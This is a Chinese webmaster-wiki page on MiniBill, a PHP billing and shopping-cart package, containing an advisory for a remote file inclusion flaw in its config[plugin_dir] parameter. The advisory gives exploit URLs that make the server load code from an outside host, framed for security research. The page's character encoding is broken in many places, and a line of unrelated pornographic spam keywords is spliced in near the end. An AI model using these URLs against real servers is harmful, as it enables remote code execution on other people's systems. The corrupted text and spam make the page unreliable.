Minibill

MiniBill是一個(gè)采用PHP+MySQL+Smarty的定期帳單和發(fā)票管理軟件，也可以作為一個(gè)簡單易用的購物車，功能包括會員管理、無限產(chǎn)品/服務(wù)及目錄、預(yù)結(jié)算和發(fā)票、Paypal支付、庫存管理、支持插件等。

系統(tǒng)特征[ ]

安裝說明[ ]

使用說明[ ]

相關(guān)資訊[ ]

涉及程序： MiniBill Config[Plugin_Dir]

描述： MiniBill Config[Plugin_Dir]參數(shù)遠(yuǎn)程文件包含漏洞

詳細(xì)： MiniBill是用PHP編寫的ISP計(jì)費(fèi)軟件。

MiniBill處理用戶請求時(shí)存在輸入驗(yàn)證漏洞，遠(yuǎn)程攻擊者可能利用此漏洞在服務(wù)器上以Web進(jìn)程權(quán)限執(zhí)行任意命令。

MiniBill的actions/ipn.php腳本沒有正確驗(yàn)證config[include_dir]參數(shù)的輸入，允許攻擊者通過包含本地或外部資源的任意文件導(dǎo)致執(zhí)行任意代碼。成功攻擊要求打開了register_globals。

<*來源：the master

鏈接：（http://secunia.com/advisories/21688/

>

受影響系統(tǒng)： Ultrize LLC MiniBill v1.22 Beta

攻擊方法：

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)！

http://[Target]/[Path]/actions/ipn.php?config[plugin_dir]=http://cmd.gif? http://[Target]/[Path]/include/initPlugins.php?config[plugin_dir]=http://cmd.gif?

解決方案：廠商補(bǔ)?。?

Ultrize LLC

目前廠商還沒有提供補(bǔ)丁或者升級程序，我們建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁以獲取最新版本：

http://www.ultrize.com/minibill/download/minibill-20060714.zip

參考來源[ ]

參考來源

久久精品水蜜桃av综合天堂,久久精品丝袜高跟鞋,精品国产肉丝袜久久,国产一区二区三区色噜噜,黑人video粗暴亚裔

WIKI使用導(dǎo)航

站長百科導(dǎo)航

站長專題